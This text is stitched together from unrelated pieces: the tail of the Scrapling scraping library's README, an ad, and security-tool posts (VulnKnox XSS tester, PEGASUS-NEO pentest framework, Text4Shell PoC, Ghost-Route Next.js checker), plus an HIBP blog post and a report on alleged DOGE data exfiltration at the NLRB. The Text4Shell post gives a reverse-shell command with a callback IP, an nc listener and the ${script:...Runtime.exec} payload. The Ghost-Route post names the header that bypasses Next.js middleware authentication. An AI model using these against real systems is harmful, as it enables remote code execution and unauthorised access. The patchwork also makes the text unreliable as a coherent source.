Let's use a real website as an example and use one of the fetchers to fetch its source. To do this we need to find a website that will change its design/structure soon, take a copy of its source then wait for the website to make the change. Of course, that's nearly impossible to know unless I know the website's owner but that will make it a staged test haha.

To solve this issue, I will use The Web Archive's Wayback Machine. Here is a copy of StackOverFlow's website in 2010, pretty old huh?Let's test if the automatch feature can extract the same button in the old design from 2010 and the current design using the same selector :)

If I want to extract the Questions button from the old design I can use a selector like this #hmenus > div:nth-child(1) > ul > li:nth-child(1) > a This selector is too specific because it was generated by Google Chrome. Now let's test the same selector in both versions

>> from scrapling.fetchers import Fetcher
>> selector = '#hmenus > div:nth-child(1) > ul > li:nth-child(1) > a'
>> old_url = "https://web.archive.org/web/20100102003420/http://stackoverflow.com/"
>> new_url = "https://stackoverflow.com/"
>>
>> page = Fetcher(automatch_domain='stackoverflow.com').get(old_url, timeout=30)
>> element1 = page.css_first(selector, auto_save=True)
>>
>> # Same selector but used in the updated website
>> page = Fetcher(automatch_domain="stackoverflow.com").get(new_url)
>> element2 = page.css_first(selector, auto_match=True)
>>
>> if element1.text == element2.text:
... print('Scrapling found the same element in the old design and the new design!')
'Scrapling found the same element in the old design and the new design!'

Note that I used a new argument called automatch_domain, this is because for Scrapling these are two different URLs, not the website so it isolates their data. To tell Scrapling they are the same website, we then pass the domain we want to use for saving auto-match data for them both so Scrapling doesn't isolate them.

In a real-world scenario, the code will be the same except it will use the same URL for both requests so you won't need to use the automatch_domain argument. This is the closest example I can give to real-world cases so I hope it didn't confuse you :)

Notes: 1. For the two examples above I used one time the Adaptor class and the second time the Fetcher class just to show you that you can create the Adaptor object by yourself if you have the source or fetch the source using any Fetcher class then it will create the Adaptor object for you. 2. Passing the auto_save argument with the auto_match argument set to False while initializing the Adaptor/Fetcher object will only result in ignoring the auto_save argument value and the following warning message text Argument `auto_save` will be ignored because `auto_match` wasn't enabled on initialization. Check docs for more info. This behavior is purely for performance reasons so the database gets created/connected only when you are planning to use the auto-matching features. Same case with the auto_match argument.

  1. The auto_match parameter works only for Adaptor instances not Adaptors so if you do something like this you will get an error python page.css('body').css('#p1', auto_match=True) because you can't auto-match a whole list, you have to be specific and do something like python page.css_first('body').css('#p1', auto_match=True)

Find elements by filters

Inspired by BeautifulSoup's find_all function you can find elements by using find_all/find methods. Both methods can take multiple types of filters and return all elements in the pages that all these filters apply to.

  • To be more specific:
  • Any string passed is considered a tag name
  • Any iterable passed like List/Tuple/Set is considered an iterable of tag names.
  • Any dictionary is considered a mapping of HTML element(s) attribute names and attribute values.
  • Any regex patterns passed are used as filters to elements by their text content
  • Any functions passed are used as filters
  • Any keyword argument passed is considered as an HTML element attribute with its value.

So the way it works is after collecting all passed arguments and keywords, each filter passes its results to the following filter in a waterfall-like filtering system.
It filters all elements in the current page/element in the following order:

  1. All elements with the passed tag name(s).
  2. All elements that match all passed attribute(s).
  3. All elements that its text content match all passed regex patterns.
  4. All elements that fulfill all passed function(s).

Note: The filtering process always starts from the first filter it finds in the filtering order above so if no tag name(s) are passed but attributes are passed, the process starts from that layer and so on. But the order in which you pass the arguments doesn't matter.

Examples to clear any confusion :)

>> from scrapling.fetchers import Fetcher
>> page = Fetcher().get('https://quotes.toscrape.com/')
# Find all elements with tag name `div`.
>> page.find_all('div')
[<data='<div class="container"> <div class="row...' parent='<body> <div class="container"> <div clas...'>,
<data='<div class="row header-box"> <div class=...' parent='<div class="container"> <div class="row...'>,
...]

# Find all div elements with a class that equals `quote`.
>> page.find_all('div', class_='quote')
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

# Same as above.
>> page.find_all('div', {'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

# Find all elements with a class that equals `quote`.
>> page.find_all({'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

# Find all div elements with a class that equals `quote`, and contains the element `.text` which contains the word 'world' in its content.
>> page.find_all('div', {'class': 'quote'}, lambda e: "world" in e.css_first('.text::text'))
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>]

# Find all elements that don't have children.
>> page.find_all(lambda element: len(element.children) > 0)
[<data='<html lang="en"><head><meta charset="UTF...'>,
<data='<head><meta charset="UTF-8"><title>Quote...' parent='<html lang="en"><head><meta charset="UTF...'>,
<data='<body> <div class="container"> <div clas...' parent='<html lang="en"><head><meta charset="UTF...'>,
...]

# Find all elements that contain the word 'world' in its content.
>> page.find_all(lambda element: "world" in element.text)
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<a class="tag" href="/tag/world/page/1/"...' parent='<div class="tags"> Tags: <meta class="ke...'>]

# Find all span elements that match the given regex
>> page.find_all('span', re.compile(r'world'))
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>]

# Find all div and span elements with class 'quote' (No span elements like that so only div returned)
>> page.find_all(['div', 'span'], {'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

# Mix things up
>> page.find_all({'itemtype':"http://schema.org/CreativeWork"}, 'div').css('.author::text')
['Albert Einstein',
'J.K. Rowling',
...]

Is That All?

Here's what else you can do with Scrapling:

  • Accessing the lxml.etree object itself of any element directly python >>> quote._root <Element div at 0x107f98870>
  • Saving and retrieving elements manually to auto-match them outside the css and the xpath methods but you have to set the identifier by yourself.

  • To save an element to the database: python >>> element = page.find_by_text('Tipping the Velvet', first_match=True) >>> page.save(element, 'my_special_element')

  • Now later when you want to retrieve it and relocate it inside the page with auto-matching, it would be like this python >>> element_dict = page.retrieve('my_special_element') >>> page.relocate(element_dict, adaptor_type=True) [<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>] >>> page.relocate(element_dict, adaptor_type=True).css('::text') ['Tipping the Velvet']
  • if you want to keep it as lxml.etree object, leave the adaptor_type argument python >>> page.relocate(element_dict) [<Element a at 0x105a2a7b0>]

  • Filtering results based on a function

# Find all products over $50
expensive_products = page.css('.product_pod').filter(
lambda p: float(p.css('.price_color').re_first(r'[\d\.]+')) > 50
)
  • Searching results for the first one that matches a function
# Find all the products with price '53.23'
page.css('.product_pod').search(
lambda p: float(p.css('.price_color').re_first(r'[\d\.]+')) == 54.23
)
  • Doing operations on element content is the same as scrapy python quote.re(r'regex_pattern') # Get all strings (TextHandlers) that match the regex pattern quote.re_first(r'regex_pattern') # Get the first string (TextHandler) only quote.json() # If the content text is jsonable, then convert it to json using `orjson` which is 10x faster than the standard json library and provides more options except that you can do more with them like python quote.re( r'regex_pattern', replace_entities=True, # Character entity references are replaced by their corresponding character clean_match=True, # This will ignore all whitespaces and consecutive spaces while matching case_sensitive= False, # Set the regex to ignore letters case while compiling it ) Hence all of these methods are methods from the TextHandler within that contains the text content so the same can be done directly if you call the .text property or equivalent selector function.

  • Doing operations on the text content itself includes

  • Cleaning the text from any white spaces and replacing consecutive spaces with single space python quote.clean()
  • You already know about the regex matching and the fast json parsing but did you know that all strings returned from the regex search are actually TextHandler objects too? so in cases where you have for example a JS object assigned to a JS variable inside JS code and want to extract it with regex and then convert it to json object, in other libraries, these would be more than 1 line of code but here you can do it in 1 line like this python page.xpath('//script/text()').re_first(r'var dataLayer = (.+);').json()
  • Sort all characters in the string as if it were a list and return the new string python quote.sort(reverse=False)

    To be clear, TextHandler is a sub-class of Python's str so all normal operations/methods that work with Python strings will work with it.

  • Any element's attributes are not exactly a dictionary but a sub-class of mapping called AttributesHandler that's read-only so it's faster and string values returned are actually TextHandler objects so all operations above can be done on them, standard dictionary operations that don't modify the data, and more :)

  • Unlike standard dictionaries, here you can search by values too and can do partial searches. It might be handy in some cases (returns a generator of matches) python >>> for item in element.attrib.search_values('catalogue', partial=True): print(item) {'href': 'catalogue/tipping-the-velvet_999/index.html'}
  • Serialize the current attributes to JSON bytes: python >>> element.attrib.json_string b'{"href":"catalogue/tipping-the-velvet_999/index.html","title":"Tipping the Velvet"}'
  • Converting it to a normal dictionary python >>> dict(element.attrib) {'href': 'catalogue/tipping-the-velvet_999/index.html', 'title': 'Tipping the Velvet'}

Scrapling is under active development so expect many more features coming soon :)

More Advanced Usage

There are a lot of deep details skipped here to make this as short as possible so to take a deep dive, head to the docs section. I will try to keep it updated as possible and add complex examples. There I will explain points like how to write your storage system, write spiders that don't depend on selectors at all, and more...

Note that implementing your storage system can be complex as there are some strict rules such as inheriting from the same abstract class, following the singleton design pattern used in other classes, and more. So make sure to read the docs first.

[!IMPORTANT] A website is needed to provide detailed library documentation.
I'm trying to rush creating the website, researching new ideas, and adding more features/tests/benchmarks but time is tight with too many spinning plates between work, personal life, and working on Scrapling. I have been working on Scrapling for months for free after all.

If you like Scrapling and want it to keep improving then this is a friendly reminder that you can help by supporting me through the sponsor button.

⚡ Enlightening Questions and FAQs

This section addresses common questions about Scrapling, please read this section before opening an issue.

How does auto-matching work?

  1. You need to get a working selector and run it at least once with methods css or xpath with the auto_save parameter set to True before structural changes happen.
  2. Before returning results for you, Scrapling uses its configured database and saves unique properties about that element.
  3. Now because everything about the element can be changed or removed, nothing from the element can be used as a unique identifier for the database. To solve this issue, I made the storage system rely on two things:

    1. The domain of the URL you gave while initializing the first Adaptor object
    2. The identifier parameter you passed to the method while selecting. If you didn't pass one, then the selector string itself will be used as an identifier but remember you will have to use it as an identifier value later when the structure changes and you want to pass the new selector.

    Together both are used to retrieve the element's unique properties from the database later. 4. Now later when you enable the auto_match parameter for both the Adaptor instance and the method call. The element properties are retrieved and Scrapling loops over all elements in the page and compares each one's unique properties to the unique properties we already have for this element and a score is calculated for each one. 5. Comparing elements is not exact but more about finding how similar these values are, so everything is taken into consideration, even the values' order, like the order in which the element class names were written before and the order in which the same element class names are written now. 6. The score for each element is stored in the table, and the element(s) with the highest combined similarity scores are returned.

How does the auto-matching work if I didn't pass a URL while initializing the Adaptor object?

Not a big problem as it depends on your usage. The word default will be used in place of the URL field while saving the element's unique properties. So this will only be an issue if you used the same identifier later for a different website that you didn't pass the URL parameter while initializing it as well. The save process will overwrite the previous data and auto-matching uses the latest saved properties only.

If all things about an element can change or get removed, what are the unique properties to be saved?

For each element, Scrapling will extract: - Element tag name, text, attributes (names and values), siblings (tag names only), and path (tag names only). - Element's parent tag name, attributes (names and values), and text.

I have enabled the auto_save/auto_match parameter while selecting and it got completely ignored with a warning message

That's because passing the auto_save/auto_match argument without setting auto_match to True while initializing the Adaptor object will only result in ignoring the auto_save/auto_match argument value. This behavior is purely for performance reasons so the database gets created only when you are planning to use the auto-matching features.

I have done everything as the docs but the auto-matching didn't return anything, what's wrong?

It could be one of these reasons: 1. No data were saved/stored for this element before. 2. The selector passed is not the one used while storing element data. The solution is simple - Pass the old selector again as an identifier to the method called. - Retrieve the element with the retrieve method using the old selector as identifier then save it again with the save method and the new selector as identifier. - Start using the identifier argument more often if you are planning to use every new selector from now on. 3. The website had some extreme structural changes like a new full design. If this happens a lot with this website, the solution would be to make your code as selector-free as possible using Scrapling features.

Can Scrapling replace code built on top of BeautifulSoup4?

Pretty much yeah, almost all features you get from BeautifulSoup can be found or achieved in Scrapling one way or another. In fact, if you see there's a feature in bs4 that is missing in Scrapling, please make a feature request from the issues tab to let me know.

Can Scrapling replace code built on top of AutoScraper?

Of course, you can find elements by text/regex, find similar elements in a more reliable way than AutoScraper, and finally save/retrieve elements manually to use later as the model feature in AutoScraper. I have pulled all top articles about AutoScraper from Google and tested Scrapling against examples in them. In all examples, Scrapling got the same results as AutoScraper in much less time.

Is Scrapling thread-safe?

Yes, Scrapling instances are thread-safe. Each Adaptor instance maintains its state.

More Sponsors!

Contributing

Everybody is invited and welcome to contribute to Scrapling. There is a lot to do!

Please read the contributing file before doing anything.

Disclaimer for Scrapling Project

[!CAUTION] This library is provided for educational and research purposes only. By using this library, you agree to comply with local and international laws regarding data scraping and privacy. The authors and contributors are not responsible for any misuse of this software. This library should not be used to violate the rights of others, for unethical purposes, or to use data in an unauthorized or illegal manner. Do not use it on any website unless you have permission from the website owner or within their allowed rules like the robots.txt file, for example.

License

This work is licensed under BSD-3

Acknowledgments

This project includes code adapted from: - Parsel (BSD License) - Used for translator submodule

Thanks and References

Known Issues

  • In the auto-matching save process, the unique properties of the first element from the selection results are the only ones that get saved. So if the selector you are using selects different elements on the page that are in different locations, auto-matching will probably return to you the first element only when you relocate it later. This doesn't include combined CSS selectors (Using commas to combine more than one selector for example) as these selectors get separated and each selector gets executed alone.

Designed & crafted with ❤️ by Karim Shoair.



Cisco XDR Just Changed the Game, Again

Clear verdict. Decisive action. AI speed. Cisco XDR turns noise into clarity and alerts into action—enabling confident, timely response at scale.

VulnKnox - A Go-based Wrapper For The KNOXSS API To Automate XSS Vulnerability Testing

By: Unknown


VulnKnox is a powerful command-line tool written in Go that interfaces with the KNOXSS API. It automates the process of testing URLs for Cross-Site Scripting (XSS) vulnerabilities using the advanced capabilities of the KNOXSS engine.


Features

  • Supports pipe input for passing file lists and echoing URLs for testing
  • Configurable retries and timeouts
  • Supports GET, POST, and BOTH HTTP methods
  • Advanced Filter Bypass (AFB) feature
  • Flash Mode for quick XSS polyglot testing
  • CheckPoC feature to verify the proof of concept
  • Concurrent processing with configurable parallelism
  • Custom headers support for authenticated requests
  • Proxy support
  • Discord webhook integration for notifications
  • Detailed output with color-coded results

Installation

go install github.com/iqzer0/vulnknox@latest

Configuration

Before using the tool, you need to set up your configuration:

API Key

Obtain your KNOXSS API key from knoxss.me.

On the first run, a default configuration file will be created at:

Linux/macOS: ~/.config/vulnknox/config.json
Windows: %APPDATA%\VulnKnox\config.json
Edit the config.json file and replace YOUR_API_KEY_HERE with your actual API key.

Discord Webhook (Optional)

If you want to receive notifications on Discord, add your webhook URL to the config.json file or use the -dw flag.

Usage

Usage of vulnknox:

-u Input URL to send to KNOXSS API
-i Input file containing URLs to send to KNOXSS API
-X GET HTTP method to use: GET, POST, or BOTH
-pd POST data in format 'param1=value&param2=value'
-headers Custom headers in format 'Header1:value1,Header2:value2'
-afb Use Advanced Filter Bypass
-checkpoc Enable CheckPoC feature
-flash Enable Flash Mode
-o The file to save the results to
-ow Overwrite output file if it exists
-oa Output all results to file, not just successful ones
-s Only show successful XSS payloads in output
-p 3 Number of parallel processes (1-5)
-t 600 Timeout for API requests in seconds
-dw Discord Webhook URL (overrides config file)
-r 3 Number of retries for failed requests
-ri 30 Interval between retries in seconds
-sb 0 Skip domains after this many 403 responses
-proxy Proxy URL (e.g., http://127.0.0.1:8080)
-v Verbose output
-version Show version number
-no-banner Suppress the banner
-api-key KNOXSS API Key (overrides config file)

Basic Examples

Test a single URL using GET method:

vulnknox -u "https://example.com/page?param=value"

Test a URL with POST data:

vulnknox -u "https://example.com/submit" -X POST -pd "param1=value1&param2=value2"

Enable Advanced Filter Bypass and Flash Mode:

vulnknox -u "https://example.com/page?param=value" -afb -flash

Use custom headers (e.g., for authentication):

vulnknox -u "https://example.com/secure" -headers "Cookie:sessionid=abc123"

Process URLs from a file with 5 concurrent processes:

vulnknox -i urls.txt -p 5

Send notifications to Discord on successful XSS findings:

vulnknox -u "https://example.com/page?param=value" -dw "https://discord.com/api/webhooks/your/webhook/url"

Advanced Usage

Test both GET and POST methods with CheckPoC enabled:

vulnknox -u "https://example.com/page" -X BOTH -checkpoc

Use a proxy and increase the number of retries:

vulnknox -u "https://example.com/page?param=value" -proxy "http://127.0.0.1:8080" -r 5

Suppress the banner and only show successful XSS payloads:

vulnknox -u "https://example.com/page?param=value" -no-banner -s

Output Explanation

[ XSS! ]: Indicates a successful XSS payload was found.
[ SAFE ]: No XSS vulnerability was found in the target.
[ ERR! ]: An error occurred during the request.
[ SKIP ]: The domain or URL was skipped due to multiple failed attempts (e.g., after receiving too many 403 Forbidden responses as specified by the -sb option).
[BALANCE]: Indicates your current API usage with KNOXSS, showing how many API calls you've used out of your total allowance.

The tool also provides a summary at the end of execution, including the number of requests made, successful XSS findings, safe responses, errors, and any skipped domains.

Contributing

Contributions are welcome! If you have suggestions for improvements or encounter any issues, please open an issue or submit a pull request.

License

This project is licensed under the MIT License.

Credits

@KN0X55
@BruteLogic
@xnl_h4ck3r



PEGASUS-NEO - A Comprehensive Penetration Testing Framework Designed For Security Professionals And Ethical Hackers. It Combines Multiple Security Tools And Custom Modules For Reconnaissance, Exploitation, Wireless Attacks, Web Hacking, And More

By: Unknown


                              ____                                  _   _ 
| _ \ ___ __ _ __ _ ___ _ _ ___| \ | |
| |_) / _ \/ _` |/ _` / __| | | / __| \| |
| __/ __/ (_| | (_| \__ \ |_| \__ \ |\ |
|_| \___|\__, |\__,_|___/\__,_|___/_| \_|
|___/
███▄ █ ▓█████ ▒█████
██ ▀█ █ ▓█ ▀ ▒██▒ ██▒
▓██ ▀█ ██▒▒███ ▒██░ ██▒
▓██▒ ▐▌██▒▒▓█ ▄ ▒██ ██░
▒██░ ▓██░░▒████▒░ ████▓▒░
░ ▒░ ▒ ▒ ░░ ▒░ ░░ ▒░▒░▒░
░ ░░ ░ ▒░ ░ ░ ░ ░ ▒ ▒░
░ ░ ░ ░ ░ ░ ░ ▒
░ ░ ░ ░ ░

PEGASUS-NEO Penetration Testing Framework

 

🛡️ Description

PEGASUS-NEO is a comprehensive penetration testing framework designed for security professionals and ethical hackers. It combines multiple security tools and custom modules for reconnaissance, exploitation, wireless attacks, web hacking, and more.

⚠️ Legal Disclaimer

This tool is provided for educational and ethical testing purposes only. Usage of PEGASUS-NEO for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state, and federal laws.

Developers assume no liability and are not responsible for any misuse or damage caused by this program.

🔒 Copyright Notice

PEGASUS-NEO - Advanced Penetration Testing Framework
Copyright (C) 2024 Letda Kes dr. Sobri. All rights reserved.

This software is proprietary and confidential. Unauthorized copying, transfer, or
reproduction of this software, via any medium is strictly prohibited.

Written by Letda Kes dr. Sobri <muhammadsobrimaulana31@gmail.com>, January 2024

🌟 Features

Password: Sobri

  • Reconnaissance & OSINT
  • Network scanning
  • Email harvesting
  • Domain enumeration
  • Social media tracking

  • Exploitation & Pentesting

  • Automated exploitation
  • Password attacks
  • SQL injection
  • Custom payload generation

  • Wireless Attacks

  • WiFi cracking
  • Evil twin attacks
  • WPS exploitation

  • Web Attacks

  • Directory scanning
  • XSS detection
  • SQL injection
  • CMS scanning

  • Social Engineering

  • Phishing templates
  • Email spoofing
  • Credential harvesting

  • Tracking & Analysis

  • IP geolocation
  • Phone number tracking
  • Email analysis
  • Social media hunting

🔧 Installation

# Clone the repository
git clone https://github.com/sobri3195/pegasus-neo.git

# Change directory
cd pegasus-neo

# Install dependencies
sudo python3 -m pip install -r requirements.txt

# Run the tool
sudo python3 pegasus_neo.py

📋 Requirements

  • Python 3.8+
  • Linux Operating System (Kali/Ubuntu recommended)
  • Root privileges
  • Internet connection

🚀 Usage

  1. Start the tool:
sudo python3 pegasus_neo.py
  1. Enter authentication password
  2. Select category from main menu
  3. Choose specific tool or module
  4. Follow on-screen instructions

🔐 Security Features

  • Source code protection
  • Integrity checking
  • Anti-tampering mechanisms
  • Encrypted storage
  • Authentication system

🛠️ Supported Tools

Reconnaissance & OSINT

  • Nmap
  • Wireshark
  • Maltego
  • Shodan
  • theHarvester
  • Recon-ng
  • SpiderFoot
  • FOCA
  • Metagoofil

Exploitation & Pentesting

  • Metasploit
  • SQLmap
  • Commix
  • BeEF
  • SET
  • Hydra
  • John the Ripper
  • Hashcat

Wireless Hacking

  • Aircrack-ng
  • Kismet
  • WiFite
  • Fern Wifi Cracker
  • Reaver
  • Wifiphisher
  • Cowpatty
  • Fluxion

Web Hacking

  • Burp Suite
  • OWASP ZAP
  • Nikto
  • XSStrike
  • Wapiti
  • Sublist3r
  • DirBuster
  • WPScan

📝 Version History

  • v1.0.0 (2024-01) - Initial release
  • v1.1.0 (2024-02) - Added tracking modules
  • v1.2.0 (2024-03) - Added tool installer

👥 Contributing

This is a proprietary project and contributions are not accepted at this time.

🤝 Support

For support, please email muhammadsobrimaulana31@gmail.com atau https://lynk.id/muhsobrimaulana

⚖️ License

This project is protected under proprietary license. See the LICENSE file for details.

Made with ❤️ by Letda Kes dr. Sobri



You'll Soon Be Able to Sign in to Have I Been Pwned (but Not Login, Log in or Log On)

You'll Soon Be Able to Sign in to Have I Been Pwned (but Not Login, Log in or Log On)

How do seemingly little things manage to consume so much time?! We had a suggestion this week that instead of being able to login to the new HIBP website, you should instead be able to log in. This initially confused me because I've been used to logging on to things for decades:

You'll Soon Be Able to Sign in to Have I Been Pwned (but Not Login, Log in or Log On)

So, I went and signed in (yep, different again) to X and asked the masses what the correct term was:

When accessing your @haveibeenpwned dashboard, which of the following should you do? Preview screen for reference: https://t.co/9gqfr8hZrY

— Troy Hunt (@troyhunt) April 23, 2025

Which didn't result in a conclusive victor, so, I started browsing around.

Cloudflare's Zero Trust docs contain information about customising the login page, which I assume you can do once you log in:

You'll Soon Be Able to Sign in to Have I Been Pwned (but Not Login, Log in or Log On)

Another, uh, "popular" site prompts you to log in:

You'll Soon Be Able to Sign in to Have I Been Pwned (but Not Login, Log in or Log On)

After which you're invited to sign in:

You'll Soon Be Able to Sign in to Have I Been Pwned (but Not Login, Log in or Log On)

You can log in to Canva, which is clearly indicated by the HTML title, which suggests you're on the login page:

You'll Soon Be Able to Sign in to Have I Been Pwned (but Not Login, Log in or Log On)

You can log on to the Commonwealth Bank down here in Australia:

You'll Soon Be Able to Sign in to Have I Been Pwned (but Not Login, Log in or Log On)

But the login page for ANZ bank requires to log in, unless you've forgotten your login details:

You'll Soon Be Able to Sign in to Have I Been Pwned (but Not Login, Log in or Log On)

Ah, but many of these are just the difference between the noun "login" (the page is a thing) and the verb "log in" (when you perform an action), right? Well... depends who you bank with 🤷‍♂️

You'll Soon Be Able to Sign in to Have I Been Pwned (but Not Login, Log in or Log On)

And maybe you don't log in or login at all:

You'll Soon Be Able to Sign in to Have I Been Pwned (but Not Login, Log in or Log On)

Finally, from the darkness of seemingly interchangeable terms that may or may not violate principles of English language, emerged a pattern. You also sign in to Google:

You'll Soon Be Able to Sign in to Have I Been Pwned (but Not Login, Log in or Log On)

And Microsoft:

You'll Soon Be Able to Sign in to Have I Been Pwned (but Not Login, Log in or Log On)

And Amazon:

You'll Soon Be Able to Sign in to Have I Been Pwned (but Not Login, Log in or Log On)

And Yahoo:

You'll Soon Be Able to Sign in to Have I Been Pwned (but Not Login, Log in or Log On)

And, as I mentioned earlier, X:

You'll Soon Be Able to Sign in to Have I Been Pwned (but Not Login, Log in or Log On)

And now, Have I Been Pwned:

You'll Soon Be Able to Sign in to Have I Been Pwned (but Not Login, Log in or Log On)

There are some notable exceptions (Facebook and ChatGPT, for example), but "sign in" did emerge as the frontrunner among the world's most popular sites. If I really start to overthink it, I do feel that "log[whatever]" implies something different to why we authenticate to systems today and is more a remnant of a bygone era. But frankly, that argument is probably no more valid than whether you're doing a verb thing or a noun thing.

Text4Shell-Exploit - A Custom Python-based Proof-Of-Concept (PoC) Exploit Targeting Text4Shell (CVE-2022-42889), A Critical Remote Code Execution Vulnerability In Apache Commons Text Versions < 1.10

By: Unknown


A custom Python-based proof-of-concept (PoC) exploit targeting Text4Shell (CVE-2022-42889), a critical remote code execution vulnerability in Apache Commons Text versions < 1.10. This exploit targets vulnerable Java applications that use the StringSubstitutor class with interpolation enabled, allowing injection of ${script:...} expressions to execute arbitrary system commands.

In this PoC, exploitation is demonstrated via the data query parameter; however, the vulnerable parameter name may vary depending on the implementation. Users should adapt the payload and request path accordingly based on the target application's logic.

Disclaimer: This exploit is provided for educational and authorized penetration testing purposes only. Use responsibly and at your own risk.


Description

This is a custom Python3 exploit for the Apache Commons Text vulnerability known as Text4Shell (CVE-2022-42889). It allows Remote Code Execution (RCE) via insecure interpolators when user input is dynamically evaluated by StringSubstitutor.

Tested against: - Apache Commons Text < 1.10.0 - Java applications using ${script:...} interpolation from untrusted input

Usage

python3 text4shell.py <target_ip> <callback_ip> <callback_port>

Example

python3 text4shell.py 127.0.0.1 192.168.1.2 4444

Make sure to set up a lsitener on your attacking machine:

nc -nlvp 4444

Payload Logic

The script injects:

${script:javascript:java.lang.Runtime.getRuntime().exec(...)}

The reverse shell is sent via /data parameter using a POST request.



Ghost-Route - Ghost Route Detects If A Next JS Site Is Vulnerable To The Corrupt Middleware Bypass Bug (CVE-2025-29927)

By: Unknown


A Python script to check Next.js sites for corrupt middleware vulnerability (CVE-2025-29927).

The corrupt middleware vulnerability allows an attacker to bypass authentication and access protected routes by send a custom header x-middleware-subrequest.

Next JS versions affected: - 11.1.4 and up

[!WARNING] This tool is for educational purposes only. Do not use it on websites or systems you do not own or have explicit permission to test. Unauthorized testing may be illegal and unethical.

 

Installation

Clone the repo

git clone https://github.com/takumade/ghost-route.git
cd ghost-route

Create and activate virtual environment

python -m venv .venv
source .venv/bin/activate

Install dependencies

pip install -r requirements.txt

Usage

python ghost-route.py <url> <path> <show_headers>
  • <url>: Base URL of the Next.js site (e.g., https://example.com)
  • <path>: Protected path to test (default: /admin)
  • <show_headers>: Show response headers (default: False)

Example

Basic Example

python ghost-route.py https://example.com /admin

Show Response Headers

python ghost-route.py https://example.com /admin True

License

MIT License

Credits



Whistleblower: DOGE Siphoned NLRB Case Data

A security architect with the National Labor Relations Board (NLRB) alleges that employees from Elon Musk‘s Department of Government Efficiency (DOGE) transferred gigabytes of sensitive data from agency case files in early March, using short-lived accounts configured to leave few traces of network activity. The NLRB whistleblower said the unusual large data outflows coincided with multiple blocked login attempts from an Internet address in Russia that tried to use valid credentials for a newly-created DOGE user account.

The cover letter from Berulis’s whistleblower statement, sent to the leaders of the Senate Select Committee on Intelligence.

The allegations came in an April 14 letter to the Senate Select Committee on Intelligence, signed by Daniel J. Berulis, a 38-year-old security architect at the NLRB.

NPR, which was the first to report on Berulis’s whistleblower complaint, says NLRB is a small, independent federal agency that investigates and adjudicates complaints about unfair labor practices, and stores “reams of potentially sensitive data, from confidential information about employees who want to form unions to proprietary business information.”

The complaint documents a one-month period beginning March 3, during which DOGE officials reportedly demanded the creation of all-powerful “tenant admin” accounts in NLRB systems that were to be exempted from network logging activity that would otherwise keep a detailed record of all actions taken by those accounts.

Berulis said the new DOGE accounts had unrestricted permission to read, copy, and alter information contained in NLRB databases. The new accounts also could restrict log visibility, delay retention, route logs elsewhere, or even remove them entirely — top-tier user privileges that neither Berulis nor his boss possessed.

Berulis writes that on March 3, a black SUV accompanied by a police escort arrived at his building — the NLRB headquarters in Southeast Washington, D.C. The DOGE staffers did not speak with Berulis or anyone else in NLRB’s IT staff, but instead met with the agency leadership.

“Our acting chief information officer told us not to adhere to standard operating procedure with the DOGE account creation, and there was to be no logs or records made of the accounts created for DOGE employees, who required the highest level of access,” Berulis wrote of their instructions after that meeting.

“We have built in roles that auditors can use and have used extensively in the past but would not give the ability to make changes or access subsystems without approval,” he continued. “The suggestion that they use these accounts was not open to discussion.”

Berulis found that on March 3 one of the DOGE accounts created an opaque, virtual environment known as a “container,” which can be used to build and run programs or scripts without revealing its activities to the rest of the world. Berulis said the container caught his attention because he polled his colleagues and found none of them had ever used containers within the NLRB network.

Berulis said he also noticed that early the next morning — between approximately 3 a.m. and 4 a.m. EST on Tuesday, March 4  — there was a large increase in outgoing traffic from the agency. He said it took several days of investigating with his colleagues to determine that one of the new accounts had transferred approximately 10 gigabytes worth of data from the NLRB’s NxGen case management system.

Berulis said neither he nor his co-workers had the necessary network access rights to review which files were touched or transferred — or even where they went. But his complaint notes the NxGen database contains sensitive information on unions, ongoing legal cases, and corporate secrets.

“I also don’t know if the data was only 10gb in total or whether or not they were consolidated and compressed prior,” Berulis told the senators. “This opens up the possibility that even more data was exfiltrated. Regardless, that kind of spike is extremely unusual because data almost never directly leaves NLRB’s databases.”

Berulis said he and his colleagues grew even more alarmed when they noticed nearly two dozen login attempts from a Russian Internet address (83.149.30,186) that presented valid login credentials for a DOGE employee account — one that had been created just minutes earlier. Berulis said those attempts were all blocked thanks to rules in place that prohibit logins from non-U.S. locations.

“Whoever was attempting to log in was using one of the newly created accounts that were used in the other DOGE related activities and it appeared they had the correct username and password due to the authentication flow only stopping them due to our no-out-of-country logins policy activating,” Berulis wrote. “There were more than 20 such attempts, and what is particularly concerning is that many of these login attempts occurred within 15 minutes of the accounts being created by DOGE engineers.”

According to Berulis, the naming structure of one Microsoft user account connected to the suspicious activity suggested it had been created and later deleted for DOGE use in the NLRB’s cloud systems: “DogeSA_2d5c3e0446f9@nlrb.microsoft.com.” He also found other new Microsoft cloud administrator accounts with nonstandard usernames, including “Whitesox, Chicago M.” and “Dancehall, Jamaica R.”

A screenshot shared by Berulis showing the suspicious user accounts.

On March 5, Berulis documented that a large section of logs for recently created network resources were missing, and a network watcher in Microsoft Azure was set to the “off” state, meaning it was no longer collecting and recording data like it should have.

Berulis said he discovered someone had downloaded three external code libraries from GitHub that neither NLRB nor its contractors ever use. A “readme” file in one of the code bundles explained it was created to rotate connections through a large pool of cloud Internet addresses that serve “as a proxy to generate pseudo-infinite IPs for web scraping and brute forcing.” Brute force attacks involve automated login attempts that try many credential combinations in rapid sequence.

